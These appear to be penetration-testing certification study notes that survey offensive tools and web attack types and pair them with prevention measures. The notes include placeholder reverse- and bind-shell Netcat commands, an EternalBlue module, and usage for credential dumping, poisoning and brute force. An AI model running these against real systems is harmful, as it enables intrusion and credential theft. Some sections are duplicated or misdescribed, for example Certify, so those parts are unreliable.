Greenbone Vulnerability Manager (GVM), often referred to as OpenVAS (Open Vulnerability Assessment System), is an open-source framework for vulnerability scanning and management.
OpenVAS is part of the GVM suite and provides comprehensive vulnerability scanning capabilities.
It helps organizations identify security issues, misconfigurations, and vulnerabilities in their networks and systems.
Usage: Perform comprehensive vulnerability assessments across networks and systems.
Example: Using OpenVAS to scan a network for vulnerabilities.
Command: openvas-start to start the service, then configure and run scans through the web interface.
TruffleHog
Purpose: Secrets detection tool.
Usage: Scan repositories for high-entropy strings and secrets such as API keys and passwords.
Purpose: Active Directory (AD) mapping and exploitation tool.
Usage: Identify and analyze AD relationships and permissions that could be exploited.
Example: Using BloodHound to map AD relationships and identify attack paths.
Command: Invoke-BloodHound -CollectionMethod All in PowerShell to collect data, then analyze with the BloodHound interface.
Tenable Nessus
Purpose: Comprehensive vulnerability scanner.
Tenable Nessus is a widely-used commercial vulnerability scanner designed to assess networks, systems, and applications for security vulnerabilities.
Developed by Tenable, Nessus offers robust scanning capabilities, ease of use, and comprehensive reporting.
It's popular among security professionals for identifying, prioritizing, and remediating vulnerabilities in IT environments.
Usage: Identify vulnerabilities, misconfigurations, and compliance issues across various systems.
Example: Running a vulnerability scan on a network.
Command: Configure and start scans through the Nessus web interface.
PowerSploit
Purpose: Post-exploitation framework for PowerShell.
PowerSploit is a collection of PowerShell scripts designed for offensive security and post-exploitation purposes.
It is widely used by penetration testers and red teamers to perform various tasks such as reconnaissance, exploitation, persistence, and data exfiltration.
PowerSploit leverages the capabilities of PowerShell to interact with the Windows operating system and perform complex tasks.
Usage: Perform various post-exploitation tasks such as privilege escalation, credential dumping, and persistence.
Example: Using PowerSploit to execute a PowerShell script for dumping credentials.
Purpose: Vulnerability scanner for container images and filesystems.
Grype is an open-source vulnerability scanner for container images and filesystems.
Developed by Anchore, it is designed to identify vulnerabilities in container images, making it an essential tool for DevOps and security teams to ensure the security of their containerized applications.
Usage: Identify known vulnerabilities in container images.
Example: Scanning a Docker image for vulnerabilities.
Command: grype docker:targetimage
Trivy
Purpose: Vulnerability scanner for containers, Kubernetes, and other artifacts.
Trivy is a comprehensive and easy-to-use open-source vulnerability scanner for container images, filesystems, and repositories.
Developed by Aqua Security, Trivy is known for its speed, accuracy, and simplicity.
It supports scanning for OS packages and application dependencies, making it a versatile tool for DevSecOps workflows.
Usage: Detect vulnerabilities, misconfigurations, and secrets.
Example: Scanning a container image for vulnerabilities.
Command: trivy image targetimage
Kube-hunter
Purpose: Kubernetes security tool.
Kube-hunter is an open-source tool designed to perform security assessments on Kubernetes clusters.
Developed by Aqua Security, it is used to identify security vulnerabilities and misconfigurations in Kubernetes environments.
Kube-hunter is particularly useful for penetration testers, security professionals, and Kubernetes administrators looking to enhance the security of their clusters.
Usage: Identify and exploit vulnerabilities in Kubernetes clusters.
Example: Running a scan to find vulnerabilities in a Kubernetes cluster.
Command: kube-hunter --remote targetclusterip
Objective 3.2
Validating Scan, Reconnaissance, and Enumeration Results
False Positives
Definition: Incorrectly identifying a non-vulnerability as a vulnerability.
Example: A scanner flags an outdated software version, but it's actually patched and secure.
Validation: Manually verify the flagged issue to confirm if it's a real vulnerability.
False Negatives
Definition: Failing to identify an actual vulnerability.
Example: A scanner misses a known SQL injection vulnerability due to misconfiguration.
Validation: Cross-check results with other tools or manual testing to ensure comprehensive coverage.
True Positives
Definition: Correctly identifying a real vulnerability.
Example: A scanner detects an open port that is genuinely exposed and vulnerable.
Validation: Verify the vulnerability through manual testing or exploitation.
Scan Completeness
Definition: Ensuring the scan has covered all intended targets and aspects.
Example: Verifying all network segments, hosts, and services were scanned.
Validation: Review scan logs and reports to ensure no areas were missed.
Troubleshooting Scan Configurations
Definition: Adjusting scan settings to ensure accurate and complete results.
Example: Modifying timeout settings or authentication credentials to ensure thorough scanning.
Validation: Perform test scans after configuration changes to verify improved accuracy and completeness.
Public Exploit Selection
Purpose: Choosing appropriate publicly available exploits to validate vulnerabilities.
Sources: Exploit databases such as Exploit-DB, Metasploit, and GitHub repositories.
Example: Selecting a Metasploit module to exploit a detected vulnerability.
Command: msfconsole, then search and use the relevant module, e.g., use exploit/windows/smb/ms17_010_eternalblue
Using Scripting to Validate Results
Purpose: Automating the validation of scan, reconnaissance, and enumeration results.
Scripting Languages: Python, Bash, PowerShell.
Examples:
Scripts for cross-checking open ports, vulnerable software versions, and open SMB shares.
Objective 3.3
Tailgating
Definition: Unauthorized entry by following an authorized person.
Prevention: Limit shared resources, use proper access controls and permissions.
Packet Crafting
Definition: Creating custom network packets to test, exploit, or disrupt systems.
Example: Sending malformed packets to crash a system or bypass security controls.
Purpose: Identify vulnerabilities, perform DoS attacks, or evade detection.
Prevention: Use robust intrusion detection/prevention systems, validate input data rigorously.
Tools
Metasploit
Definition: An open-source penetration testing framework that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Features:
Exploit Modules: Contains numerous exploit modules for a variety of vulnerabilities.
Payloads: Offers various payloads, such as Meterpreter, to interact with the exploited system.
Auxiliary Modules: Includes tools for scanning, fuzzing, and more.
Example: Using Metasploit to exploit a known vulnerability in an outdated web application and gain shell access.
Usage:
msfconsole → Launches the Metasploit console, which is the primary interface for interacting with the Metasploit Framework.
search [keyword] → Searches the Metasploit database for exploits, payloads, and auxiliary modules matching the keyword.
use [exploit_path] → Selects the exploit module to use. Example: use exploit/windows/smb/ms17_010_eternalblue.
Netcat
Definition: A versatile networking utility that reads and writes data across network connections using the TCP/IP protocol.
Features:
Port Scanning: Basic functionality for port scanning.
Data Transfer: Can be used for transferring files.
Reverse Shells: Can set up reverse or bind shells for remote access.
Example: Using Netcat to set up a reverse shell to a compromised system.
Usage:
Port scanning
Banner grabbing
File transfer
Creating reverse and bind shells
Debugging and network diagnostics
Flags:
-l: Listen mode, for inbound connects
-p: Local port number
-e: Program to execute after connection occurs
-n: Numeric-only IP addresses, no DNS
-v: Verbose mode
-u: UDP mode
-z: Zero-I/O mode (used for scanning)
Shells:
Bind Shells:
A bind shell sets up a listener on the victim machine and waits for an incoming connection. Once a connection is established, the attacker can execute commands on the victim machine.
Victim → nc -l -p [port] -e /bin/bash → Setting up a listener
Attacker → nc [victim_IP] [port] → Connecting to the listener
Reverse Shell:
A reverse shell, instead of listening for a connection, initiates a connection back to the attacker's machine. This is useful when the victim machine is behind a firewall or NAT.
Attacker → nc -l -p [port] → setting up a listener
Victim → nc [attacker_IP] [port] -e /bin/bash → connecting back to the attacker's machine
Nmap
Definition: A network scanning tool used for discovering hosts and services on a computer network.
Features:
Port Scanning: Identifies open ports on target systems.
Service Detection: Determines what services are running on open ports.
Operating System Detection: Identifies the OS of target systems.
Nmap Scripting Engine (NSE): Extends Nmap’s capabilities by using scripts.
Example: Scanning a network to identify open ports and running services with Nmap.
Usage:
-sP (or -sn): Ping Scan - Discover live hosts without performing a port scan.
-p: Specify Port(s) - Scan specific ports.
-p-: Scan all 65535 ports.
-sT: TCP Connect Scan - Uses the operating system's network services to establish a connection with the target ports.
-sS: TCP SYN Scan (Default and most popular) - Half-open scan, doesn't complete the TCP handshake.
-sU: UDP Scan - Scans for open UDP ports.
-sV: Version Detection - Detects service versions running on open ports.
-sX: The XMAS scan is named because all the flags (FIN, PSH, and URG) in the TCP header are set, making it look like a lit-up Christmas tree. It is used to identify listening ports on the target system.
-sF: FIN Scan - Sends TCP packets with the FIN flag set to check if ports are closed or open.
-sN: NULL Scan - Sends TCP packets with no flags set to identify open or closed ports.
-sA: ACK Scan
-O: OS Detection - Identifies the operating system of the target host.
-A: Aggressive Scan - Enables OS detection, version detection, script scanning, and traceroute.
-sC: Default Script Scan - Runs a set of default Nmap Scripting Engine (NSE) scripts.
--script: Run specific NSE scripts.
-oN: Normal output.
-oX: XML output.
-oG: Grepable output.
-oA: Output in all formats (normal, XML, and grepable).
Timing & Performance:
-T0: Paranoid (very slow, good for evading detection).
-T1: Sneaky (slow, good for evading detection).
-T2: Polite (slows down to use less bandwidth and target resources).
-T3: Normal (default).
-T4: Aggressive (faster, uses more bandwidth and resources).
-T5: Insane (very fast, uses maximum bandwidth and resources).
Impacket
Definition: A collection of Python classes for working with network protocols.
It allows developers to create and manipulate network packets at a low level, making it an essential tool for network administrators, penetration testers, and cybersecurity researchers.
Impacket focuses on providing low-level programmatic access to various protocols such as SMB, MSRPC, and LDAP.
Features:
SMB and MSRPC Protocols: Useful for creating custom network tools and performing various tasks in penetration tests.
Scripts: Includes scripts for executing commands on remote systems, dumping secrets, and more.
Example: Using Impacket's smbexec.py to execute commands on a remote Windows system.
Usage:
wmiexec.py → Executes commands on remote systems via WMI.
smbexec.py → Executes commands on remote systems via SMB.
psexec.py → Executes commands on remote systems via SMB, using the Windows service control manager.
mimikatz.py → Executes the Mimikatz tool on remote systems to extract credentials.
getTGT.py → Requests a TGT (Ticket Granting Ticket) from a Kerberos Key Distribution Center (KDC).
secretsdump.py → Dumps secrets from a remote machine without executing any agent.
CrackMapExec (CME)
Definition: A post-exploitation tool that helps automate the assessment of large Active Directory networks.
CrackMapExec (CME) is a versatile post-exploitation tool used for assessing the security of large Active Directory networks.
It simplifies the process of evaluating the security posture of networks by providing an easy-to-use interface for a variety of tasks, including credential validation, remote command execution, and more.
Features:
Credential Validation: Validates credentials across a network.
Command Execution: Executes commands on multiple systems.
Password Spraying: Automates the password spraying attack.
Example: Using CME to validate credentials and execute commands across an Active Directory environment.
Usage:
cme [protocol] [target] [options]
Protocols:
smb: SMB protocol (Windows file sharing)
ldap: LDAP protocol (Directory services)
winrm: Windows Remote Management
mssql: Microsoft SQL Server
Wireshark/tcpdump
Definition: Network protocol analyzers used to capture and analyze network traffic.
Features:
Packet Capture: Captures live network traffic for analysis.
Filters: Applies filters to focus on specific types of traffic.
Example: Using Wireshark to capture and analyze HTTP traffic to identify sensitive information being transmitted in plaintext.
Usage:
tcpdump -i eth0 -w capture.pcap
msfvenom
Definition: A tool within the Metasploit framework used to generate payloads.
msfvenom is a command-line utility that is part of the Metasploit Framework. It is used to generate payloads, encode shellcode, and create executable files that can be used in penetration testing and security assessments.
Features:
Payload Generation: Creates various types of payloads for different platforms.
Encoding: Encodes payloads to evade antivirus detection.
Formats: Generates payloads in various formats, such as executables, scripts, and more.
Example: Using msfvenom to generate a malicious executable payload that opens a reverse shell.
Usage:
msfvenom -p [payload] [options]
Payloads:
Windows Meterpreter Reverse TCP: windows/meterpreter/reverse_tcp
Linux Meterpreter Reverse TCP: linux/x86/meterpreter/reverse_tcp
Definition: A tool used for network poisoning attacks.
It works by poisoning name resolution requests and responding with fake answers, tricking clients into sending their authentication data to the attacker.
Features:
LLMNR, NBT-NS, and MDNS Poisoning: Intercepts and responds to broadcast requests to capture credentials.
Password Cracking: Can capture and crack hashed passwords.
Example: Using Responder to capture NTLMv2 hashes by poisoning LLMNR and NBT-NS traffic on a Windows network.
Usage:
sudo python3 Responder.py -I [interface]
Hydra
Definition: Hydra is a fast and flexible password-cracking tool used for brute force attacks against a variety of network services.
Features:
Brute Force Attacks: Supports numerous protocols for brute force attacks on login services.
Parallel Connections: Allows multiple parallel connections for faster cracking.
Custom Wordlists: Supports custom wordlists for username and password combinations.
Example: Using Hydra to brute force SSH login credentials on a remote server.
Usage:
hydra [options] [target] [module]
Flags:
-l [username]: Specifies a single username.
-L [username file]: Specifies a file with a list of usernames.
-p [password]: Specifies a single password.
-P [password file]: Specifies a file with a list of passwords.
-s [port]: Specifies the port to connect to.
-t [tasks]: Specifies the number of parallel connections.
-f: Stops after the first valid login is found.
-v: Enables verbose mode.
-V: Shows the login and password for each attempt.
-o [output file]: Specifies the file to write found logins and passwords.
Example: Using CME to validate domain credentials and execute commands across an Active Directory environment.
Usage:
cme [protocol] [target] [options]
Protocols:
smb: SMB protocol (Windows file sharing)
ldap: LDAP protocol (Directory services)
winrm: Windows Remote Management
mssql: Microsoft SQL Server
Responder
Definition: A tool used for network poisoning attacks.
Features:
LLMNR, NBT-NS, and MDNS Poisoning: Intercepts and responds to broadcast queries to capture credentials.
Password Cracking: Captures hashed passwords for offline cracking.
Example: Using Responder to capture NTLMv2 hashes by poisoning LLMNR and NBT-NS traffic on a Windows network.
Usage:
sudo python3 Responder.py -I [interface]
hashcat
Definition: A high-performance password cracking tool.
It is used to crack hashed passwords by utilizing various attack modes and optimizations.
Features:
Multi-Platform Support: Runs on various operating systems including Windows, Linux, and macOS.
Various Attack Modes: Supports dictionary attacks, brute-force attacks, mask attacks, and hybrid attacks.
GPU Acceleration: Utilizes GPU to speed up the cracking process.
Example: Using hashcat to perform a dictionary attack on a set of hashed passwords to recover plaintext passwords.
Usage → hashcat [options] [hashfile] [wordlist]
Flags:
-m [hash type]: Specifies the hash type (e.g., MD5, SHA1).
MD5: -m 0
SHA1: -m 100
SHA256: -m 1400
SHA512: -m 1700
NTLM: -m 1000
bcrypt: -m 3200
-a [attack mode]: Specifies the attack mode (e.g., dictionary, brute-force).
Straight: -a 0 (Dictionary attack)
Combination: -a 1 (Combines words from two dictionaries)
Brute-Force: -a 3 (Exhaustive search of all possible combinations)
Hybrid Wordlist + Mask: -a 6 (Applies masks to a wordlist)
Hybrid Mask + Wordlist: -a 7 (Applies wordlists to masks)
-o [output file]: Specifies the file to write cracked passwords.
--potfile-path [file]: Specifies the path to the potfile for saving cracked hashes.
-r [rule file]: Applies rules to modify or generate passwords.
-t [tasks]: Specifies the number of concurrent threads.
--status: Displays the current status of the cracking process.
John the Ripper
Definition: A fast password cracker available for many operating systems.
Features:
Multi-Platform Support: Runs on various operating systems including Unix, Windows, and MacOS.
Cracking Modes: Supports dictionary attacks, brute-force attacks, and rule-based attacks.
Customization: Allows custom rules to refine attack strategies.
Example: Using John the Ripper to crack Unix password hashes extracted from a compromised system.
Usage → john [options] [password file]
Flags:
--format=[format]: Specifies the hash format (e.g., raw-md5, sha256).
MD5: raw-md5
SHA1: raw-sha1
SHA256: raw-sha256
SHA512: raw-sha512
NTLM: nt
bcrypt: bcrypt
DES: des
--wordlist=[file]: Specifies the path to a wordlist file (dictionary attack).
--rules: Applies rules to the wordlist to generate additional passwords.
--incremental: Enables an incremental brute-force attack.
--status: Displays the current status of the cracking process.
--show: Displays the cracked passwords.
Crack MD5 hashes using a wordlist → john --format=raw-md5 --wordlist=/path/to/wordlist.txt hashfile.txt
Show cracked passwords → john --show hashfile.txt
Hydra
Definition: A parallelized login cracker that supports numerous protocols.
Features:
Protocol Support: Can attack SSH, FTP, HTTP, HTTPS, SMB, and many other services.
Custom Wordlists: Supports custom wordlists for usernames and passwords.
Parallel Connections: Uses multiple connections to speed up the cracking process.
Example: Using Hydra to brute force SSH login credentials on a remote server.
BloodHound
Definition: A tool for analyzing and attacking Active Directory relationships and permissions.
It maps out and visualizes complex AD environments, identifying potential attack paths that could be exploited to gain unauthorized access or escalate privileges.
BloodHound is particularly useful for penetration testers and security professionals to perform AD enumeration and identify security weaknesses in Windows networks.
Features:
Graph Database: Uses graph theory to find hidden relationships in Active Directory environments.
Visual Representation: Provides a graphical interface to visualize attack paths.
Query Capability: Allows complex queries to identify potential attack vectors.
Example: Using BloodHound to map out and analyze privilege escalation paths in an Active Directory domain.
-c All: Collects all data categories (users, groups, trusts, etc.).
-d [domain]: Specifies the target domain.
-dc [domain controller]: Specifies the domain controller to query.
-o [output directory]: Specifies the directory to save collected data.
bloodhound -d [domain] -u [username] -p [password] -c all
-d [domain]: Specifies the domain to query.
-u [username]: Specifies the username to use.
-p [password]: Specifies the password for the username.
-c all: Collects all data.
BloodHound analyzes and visualizes the data collected by SharpHound.
Analyze data with BloodHound → bloodhound -i /path/to/output -o /path/to/analysis
Medusa
Definition: A speed-oriented, parallel, modular, login brute-forcer.
Medusa is a fast, parallel, and flexible password-cracking tool used for brute-forcing login credentials across various network services. I
t is designed to handle large-scale attacks efficiently and supports multiple protocols, making it a valuable tool for penetration testers and security researchers.
Features:
Module Support: Supports various modules for different protocols including HTTP, SSH, and FTP.
Parallel Testing: Allows multiple parallel connections to test login credentials quickly.
Customizability: Users can add new modules or modify existing ones.
Example: Using Medusa to perform a brute-force attack on a web application's login page.
-h [host]: Specifies the target host or IP address.
-U [username file]: Specifies a file with a list of usernames.
-u [username]: Specifies a single username.
-P [password file]: Specifies a file with a list of passwords.
-p [password]: Specifies a single password.
-M [module]: Specifies the protocol or service module to use (e.g., ssh, ftp, http).
ssh: Secure Shell
ftp: File Transfer Protocol
http: Hypertext Transfer Protocol
mysql: MySQL Database
smtp: Simple Mail Transfer Protocol
pop3: Post Office Protocol
imap: Internet Message Access Protocol
rdp: Remote Desktop Protocol
telnet: Telnet Protocol
-t [tasks]: Specifies the number of concurrent connections (threads).
-f: Stops after the first successful login.
-v: Enables verbose output.
Burp Suite
Definition: A comprehensive web application security testing tool.
It provides tools for performing security assessments of web applications, including scanning for vulnerabilities, intercepting and modifying HTTP requests, and analyzing responses.
Features:
Intercepting Proxy: Intercepts and inspects HTTP/S traffic between the browser and the target application.
Scanner: Automated vulnerability scanner to identify common web vulnerabilities.
Repeater: Manually modify and resend individual HTTP requests.
Intruder: Automated attack tool for testing inputs and parameters.
Example: Using Burp Suite to intercept and modify HTTP requests to test for SQL injection vulnerabilities in a web application.
Components
Proxy: Intercepts and modifies HTTP/S traffic between your browser and the target application.
Scanner: Automates the process of scanning for vulnerabilities such as SQL injection, XSS, and more (available in the Professional edition).
Spider: Crawls the application to discover and map all its endpoints and functionality.
Intruder: Performs automated attacks on web application inputs to find vulnerabilities (e.g., brute force, fuzzing).
Repeater: Allows you to manually modify and resend individual HTTP requests to analyze responses.
Decoder: Helps decode and encode data in various formats (e.g., URL encoding, Base64).
Comparer: Compares two sets of data to find differences, useful for analyzing changes in responses or request parameters.
Objective 4.4
Attack Types
Privilege Escalation
Definition: Gaining higher privileges than originally granted.
Examples: Exploiting vulnerabilities, misconfigurations, or weak permissions.
Purpose: Access restricted areas or perform unauthorized actions.
Prevention: Regularly update and patch systems, apply the principle of least privilege, monitor for unusual activity.
Credential Dumping
Definition: Extracting credentials from a system.
Examples: Using tools like Mimikatz to extract passwords, hashes, or Kerberos tickets.
Purpose: Gain unauthorized access to other systems or services.
Prevention: Use of credential guards, monitoring, and limiting access to sensitive information.
Circumventing Security Tools
Definition: Bypassing or disabling security mechanisms.
Examples: Disabling antivirus, bypassing firewalls, or evading IDS/IPS.
Purpose: Avoid detection and continue attack activities.
Prevention: Use tamper-proof security tools, apply layered security, monitor for anomalies.
Purpose: Avoid detection and forensic investigation.
Prevention: Secure log storage, regular log audits, use of centralized logging solutions.
Unquoted Service Path Injection
Definition: Exploiting unquoted service paths to execute arbitrary code.
Examples: Creating executables in unquoted paths with spaces to be executed by the system.
Purpose: Gain elevated privileges or run malicious code.
Prevention: Ensure service paths are quoted, review and fix service configurations.
Tools
Mimikatz
Definition: A post-exploitation tool used for extracting plaintext passwords, hashes, PINs, and Kerberos tickets from memory.
It can be used to retrieve plaintext passwords, hash values, and Kerberos tickets from memory.
Mimikatz is commonly used by security professionals for penetration testing and by attackers to escalate privileges or move laterally within a network.
Features:
Dump Credentials: Extract passwords and hashes from memory.
Pass-the-Hash: Use NTLM hashes to authenticate without requiring plaintext passwords.
Pass-the-Ticket: Use Kerberos tickets to access services.
Kerberoasting: Extract service tickets from memory for offline cracking.
Golden Ticket: Create and inject forged Kerberos tickets for domain-wide access.
Silver Ticket: Create and inject forged Kerberos service tickets.
Example: Using Mimikatz to dump user credentials from a compromised machine's memory.
Definition: Rubeus is a post-exploitation tool written in C# that interacts with the Kerberos authentication protocol.
It is used for various activities related to Kerberos tickets and authentication, including ticket extraction, manipulation, and forging.
Rubeus is particularly useful for security professionals and attackers in performing advanced Kerberos-based attacks, such as Pass-the-Ticket (PTT), Kerberoasting, and Golden Ticket attacks.
Features:
Dump Kerberos Tickets: Extract TGTs (Ticket Granting Tickets) and service tickets from memory.
Pass-the-Ticket: Inject and use Kerberos tickets for authentication.
Kerberoasting: Extract service tickets for offline cracking.
Golden Ticket: Create and inject forged Kerberos tickets for domain-wide access.
Silver Ticket: Create and inject forged Kerberos service tickets.
Ticket Renewal: Renew existing tickets and adjust their expiration.
Example: Using Rubeus to renew an expired Kerberos ticket to maintain access without re-entering credentials.
Usage:
Dumping Kerberos Tickets: → Rubeus.exe dump
Pass-the-Ticket → Rubeus.exe ptt /ticket:[path_to_ticket]
Certify
Definition: Certify is a tool designed for managing and automating the issuance of SSL/TLS certificates, primarily for use in securing web servers and applications.
It integrates with Certificate Authorities (CAs) to automate the certificate issuance process, making it easier to deploy and maintain secure communications.
It is designed to enumerate and collect various system and user information, which can be useful for further exploitation or understanding the target environment.
Seatbelt can identify potential privilege escalation vectors, such as unpatched vulnerabilities or misconfigured permissions.
Features:
Certificate Request: Requests certificates with specific attributes.
Certificate Abuse: Exploits misconfigurations in AD CS to escalate privileges.
Example: Using Certify to request a certificate for a privileged account and using it to authenticate as that account.
Seatbelt
Definition: Seatbelt is a post-exploitation tool used for information gathering and privilege escalation on Windows systems.
It is designed to enumerate and collect various system and user information, which can be useful for further exploitation or understanding the target environment.
Seatbelt can identify potential privilege escalation vectors, such as unpatched vulnerabilities or misconfigured permissions.
Features:
System Enumeration: Gathers detailed information about the system, including installed software, running processes, and security settings.
Credential Enumeration: Identifies potential credentials and sensitive data.
Example: Using Seatbelt to gather information about installed security software and system configurations on a compromised machine.
Usage → Seatbelt.exe
Flags:
-p: Collects information about potential privilege escalation paths.
-n: Collects network-related information, such as network shares and connections.
-s: Collects system information, including OS version and installed software.
Definition: A task automation and configuration management framework from Microsoft, with a scripting language and a command-line shell.
PowerShell Integrated Scripting Environment (ISE) is a graphical user interface (GUI) for PowerShell, providing a more user-friendly environment for writing, testing, and debugging PowerShell scripts.
Features:
Script Editor: A multi-line editor with syntax highlighting for writing and editing PowerShell scripts.
Console Pane: A PowerShell console for executing commands interactively.
Debugging Tools: Built-in tools for debugging scripts, including breakpoints, step execution, and variable inspection.
Integrated Help: Provides context-sensitive help for cmdlets and functions.
Example: Using PowerShell to execute scripts that enumerate system information or deploy malware.
Usage:
Get-Command: Lists all available cmdlets, functions, workflows, aliases, and scripts.
Get-Help: Provides help documentation for cmdlets and functions.
Get-Process: Retrieves information about running processes.
Set-ExecutionPolicy: Configures the script execution policy.
Invoke-Command: Executes commands on remote systems.
PsExec
Definition: A command-line tool that allows administrators to execute processes on remote systems.
PsExec is a command-line utility from Microsoft’s Sysinternals suite that allows you to execute processes on remote systems and interact with them as if you were sitting at the console of the remote machine.
It is commonly used for remote administration, troubleshooting, and scripting in Windows environments.
PsExec can be used to run processes with elevated privileges, create remote shells, and execute commands across multiple systems.
Features:
Remote Execution: Run commands and executables on remote systems.
Interactive Sessions: Start interactive sessions on remote systems.
Privilege Management: Execute commands with different user privileges, including SYSTEM.
No Installation Required: PsExec does not need to be installed on the remote systems; it runs as a standalone executable.
Example: Using PsExec to run a script on a remote system to deploy malware or extract data.
Usage:
Run a Command on a Remote System → psexec \\RemotePC -u [username] -p [password] [command]
Run a Command with SYSTEM Privileges → psexec \\RemotePC -s [command]
Redirect Output to a File → psexec \\RemotePC -u [username] -p [password] [command] > output.txt
Execute a Command on Multiple Systems → psexec \\System1,\\System2,\\System3 -u [username] -p [password] [command]
Evil-WinRM
Definition:Evil-WinRM is a Ruby-based tool used for remote management of Windows systems over WinRM (Windows Remote Management).
It is often used in penetration testing and red teaming engagements to exploit WinRM vulnerabilities, gain remote access, and execute commands on target systems.
Evil-WinRM can be employed to perform various administrative tasks, exploit WinRM misconfigurations, and facilitate post-exploitation activities.
Features:
Remote Command Execution: Execute commands and scripts on remote Windows systems via WinRM.
Interactive Shell: Provides an interactive command shell on the remote system.
Credential Management: Supports passing credentials for authentication and session management.
File Upload/Download: Allows uploading and downloading files from the remote system.
Example: Using Evil-WinRM to gain a remote shell on a compromised Windows machine and execute commands.
Usage:
Connecting to a Remote System → evil-winrm -i [IP_ADDRESS] -u [USERNAME] -p [PASSWORD]
Definition: Using legitimate, built-in system binaries to perform malicious actions.
Living Off the Land Binaries (LOLbins) refers to the practice of using legitimate, pre-installed binaries and tools available on a system to achieve objectives like privilege escalation, persistence, or data exfiltration without deploying new, malicious software.
This technique leverages existing system binaries that can be exploited to perform actions typically associated with malicious activities.
The advantage of LOLbins is that they often evade detection by traditional security solutions since they are legitimate system components.
Examples:
mshta.exe: Executes HTML applications (HTA files) and can be used to execute scripts.
powershell.exe: Executes PowerShell scripts for various tasks.
certutil.exe: Downloads and installs certificates but can be used to download files from the internet.
Purpose: Avoid detection by using trusted system binaries for malicious activities.
Example: Using certutil.exe to download and execute a malicious payload on a compromised machine.
Objective 4.5
Attack Types
Brute-force Attack
Definition: Systematically trying all possible combinations of passwords or encryption keys.
Examples: Using automated tools to guess passwords or decrypt data.
Prevention: Implement account lockout mechanisms, use strong passwords, and employ rate limiting.
Collision Attack
Definition: Exploiting hash function weaknesses to find two inputs that produce the same hash value.
Examples: Generating two different documents with the same hash value to trick digital signature verification.
Prevention: Use collision-resistant hash functions like SHA-256.
Directory Traversal
Definition: Exploiting insufficient input validation to access directories and files outside of the web root directory.
Examples: Using “../” sequences to navigate to restricted directories.
Prevention: Validate and sanitize user inputs, restrict file access permissions.
Server-Side Request Forgery (SSRF)
Definition: Exploiting a server to make requests to unintended locations, often to internal systems.
Examples: Forcing a server to make requests to local network services or metadata endpoints.
Prevention: Validate and sanitize URLs, restrict outbound traffic.
Cross-Site Request Forgery (CSRF)
Definition: Forcing a user to execute unwanted actions on a web application where they are authenticated.
Examples: Sending a crafted link to a user to perform actions like changing passwords or transferring funds.
Prevention: Implement anti-CSRF tokens, use same-site cookies, and ensure state changes require re-authentication.
Deserialization Attack
Definition: Exploiting insecure deserialization to execute arbitrary code or carry out unauthorized actions.
Examples: Manipulating serialized objects to execute commands or elevate privileges.
Prevention: Use safe serialization libraries, validate and sanitize serialized data.
Injection Attacks
SQL Injection
Definition: Inserting malicious SQL queries via input fields.
Examples: Exploiting input fields to run unauthorized SQL commands.
Prevention: Use parameterized queries, validate and sanitize inputs.
Command Injection
Definition: Injecting commands to be executed by the system shell.
Examples: Input fields allowing shell commands to be executed.
Prevention: Validate inputs, use secure coding practices.
Cross-Site Scripting (XSS)
Definition: Injecting malicious scripts into web pages viewed by other users.
Examples: Executing JavaScript in a user’s browser to steal cookies or deface websites.
Prevention: Encode outputs, validate and sanitize inputs.
Server-Side Template Injection
Definition: Injecting code into templates that are processed on the server side.
Examples: Manipulating template variables to execute server-side code.
Prevention: Use secure template engines, validate and sanitize template inputs.
Insecure Direct Object Reference (IDOR)
Definition: Accessing objects directly using user-supplied input without proper authorization checks.
Examples: Manipulating URL parameters to access other users’ data.
Prevention: Implement access controls and authorization checks.
Session Hijacking
Definition: Stealing or manipulating session tokens to gain unauthorized access.
Examples: Using stolen session cookies to impersonate a user.
Prevention: Use secure cookies, implement session expiration, use HTTPS.
Arbitrary Code Execution
Definition: Executing arbitrary code on a target system.
Examples: Exploiting vulnerabilities to run unauthorized code.
Prevention: Regularly update and patch systems, use exploit mitigation techniques.
File Inclusions
Remote File Inclusion (RFI)
Definition: Including remote files via input fields.
Examples: Using URLs in input fields to include malicious scripts.
Prevention: Restrict file inclusion, validate and sanitize inputs.
Local File Inclusion (LFI)
Definition: Including local files via input fields.
Examples: Using file paths in input fields to access sensitive files.
Prevention: Restrict file inclusion, validate and sanitize inputs.
Web Shell
Definition: Uploading scripts that provide remote access to a server.
Examples: Using file upload vulnerabilities to deploy a shell.
Prevention: Validate and sanitize file uploads, use secure configurations.
API Abuse
Definition: Exploiting weaknesses in APIs to perform unauthorized actions.
Examples: Manipulating API requests to bypass authentication or extract sensitive data.
Prevention: Implement strong authentication and authorization, validate and sanitize inputs.
JSON Web Token (JWT) Manipulation
Definition: Tampering with JWT payloads or signatures to gain unauthorized access.
Examples: Modifying JWT claims to elevate privileges or bypass authentication.
Prevention: Use strong signing algorithms, validate JWT integrity, and implement proper key management.
Tools
TruffleHog
Purpose: Searches through git repositories for high entropy strings and secrets, such as passwords or API keys.
Use Case: Secrets enumeration, credential dumping.
Example: Finding accidentally committed AWS secret keys in a public repository.
Burp Suite
Purpose: Comprehensive web vulnerability scanner and testing tool.
Use Case: Web application testing, manual testing, and automated scanning for vulnerabilities like SQL injection, XSS, and CSRF.
Example: Intercepting and modifying web traffic to test for injection vulnerabilities.
Zed Attack Proxy (ZAP)
Purpose: Open-source web application security scanner.
Use Case: Finding security vulnerabilities in web applications during development and testing phases.
Example: Automating scans to identify common web vulnerabilities like XSS and SQL injection.
Postman
Purpose: API development and testing tool.
Use Case: API testing, exploring API endpoints, and validating API responses.
Example: Testing RESTful APIs for improper configurations and potential abuses.
sqlmap
Purpose: Automated tool for SQL injection and database takeover.
Use Case: Identifying and exploiting SQL injection vulnerabilities.
Example: Automating the process of detecting and exploiting SQL injection points to extract data from databases.
Gobuster/DirBuster
Purpose: Directory and file brute-forcing tools.
Use Case: Finding hidden directories and files on a web server.
Example: Enumerating directories and files to uncover sensitive information not meant to be publicly accessible.
Wfuzz
Purpose: Web application brute-forcing tool for directories, files, and parameters.
Use Case: Fuzzing web applications to discover vulnerabilities like directory traversal and file inclusions.
Example: Brute-forcing URL parameters to discover hidden endpoints and potential vulnerabilities.
Use Case: Performing security assessments on AWS environments to identify misconfigurations and vulnerabilities.
Example: Testing for weak IAM policies, S3 bucket permissions, and other AWS-specific issues.
Prevention: Regularly audit and review AWS configurations using Pacu to identify and remediate security gaps.
Usage → python3 pacu.py
Docker Bench
Purpose: Security auditing tool for Docker containers
Docker Bench for Security is an open-source script that checks for common best practices around the deployment and configuration of Docker containers in production.
It helps in assessing the security of Docker installations against the benchmarks provided by the Center for Internet Security (CIS).
Features:
Security Checks: Runs a series of checks to ensure Docker is securely configured.
